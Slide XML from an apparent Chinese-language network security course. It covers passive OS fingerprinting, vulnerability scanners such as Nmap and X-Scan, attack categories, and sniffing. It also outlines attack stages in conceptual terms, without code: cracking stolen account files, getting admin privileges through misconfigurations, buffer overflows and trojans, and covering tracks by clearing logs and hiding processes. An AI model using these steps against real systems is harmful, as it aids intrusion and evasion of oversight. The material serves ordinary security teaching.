            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>参数有不同默认设置：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TTL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>time to live</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Don't Fragment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>type of service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>窗口大小（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>滑动窗口）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>缺点：可靠性比主动协议栈识别差</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21506" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>被动协议栈指纹识别</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zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>漏洞库匹配方法 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>模拟黑客攻击手法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是一个网络探测和漏洞扫描程序</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" smtClean="0"/>
              <a:t>X-Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="it-IT" smtClean="0"/>
              <a:t>由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="it-IT"/>
              <a:t>安全焦点开发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="it-IT" smtClean="0"/>
              <a:t>的免费</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="it-IT"/>
              <a:t>的漏洞扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="it-IT" smtClean="0"/>
              <a:t>软件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="it-IT"/>
              <a:t>远程服务类型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="it-IT"/>
              <a:t>操作系统类型及版本</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="it-IT"/>
              <a:t>各种弱口令漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="it-IT"/>
              <a:t>后门</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="it-IT"/>
              <a:t>应用服务漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="it-IT"/>
              <a:t>网络设备漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="it-IT"/>
              <a:t>拒绝服务漏洞等二十几个大类 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>系统漏洞扫描</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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>信息保障技术框架（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IATF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>》3.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>版中将攻击分为以下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>类： </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>被动攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>主动攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>物理临近攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>内部人员攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>软硬件配装攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284674" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击的种类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ED037B54-41A4-4950-83FD-BF340C20BBAC}"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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>设法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>盗窃帐户文件，进行破解，从中获取某用户的帐户和口令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>也</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>可利用某些工具或系统漏洞登录主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> 。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167938" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>获取目标主机的一般权限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D9865A22-6078-461C-8347-26764E1030A3}" type="slidenum">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1027"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）获得管理员口令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>管理安全漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>错误的文件访问权、错误的系统配置、某些缓冲区溢出漏洞；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>特洛伊木马窃取管理员口令。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168962" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>获取目标主机的管理权限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{54F58422-2144-499E-9DB9-CCDC7A8CDE6D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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9" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>清除日志、删除拷贝的文件等手段来隐藏自己的踪迹。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>进程隐藏、连接隐藏以及改变系统时间造成日志文件紊乱等方法。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131074" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>隐藏自己的行踪</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{88079EE2-F6F2-4C8A-97CB-36FB1CC23156}"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anose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>网络</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>监听</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58370" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{99A46C95-1AEB-49D4-AF17-D726431B01BD}"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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>监视网络的流量、状态、数据等信息，分析数据包，获得有价值的信息。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>双刃剑</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>管理工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>：实时观测分析数据包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，从而进行网络故障定位</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>信息收集工具：攻击者们常用的收集信息工具 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15362" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网络</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>监听（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Sniffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>） </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59395" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B8C09CEF-22E6-42C2-A55F-8E359C4B6999}"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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>口令、帐号</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>机密或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>敏感数据、信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>e-mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>内容）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>流量信息：窥探低级的协议信息 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17410" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>窃听信息 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61443" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{81E74DEB-AFD9-4B37-B360-366003BBBAC4}"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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>共享式网络</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>HUB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>连接网络</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>交换式网络</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>通过交换机连接网络</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224258" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Sniffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网络环境</a:t>
            </a:r>
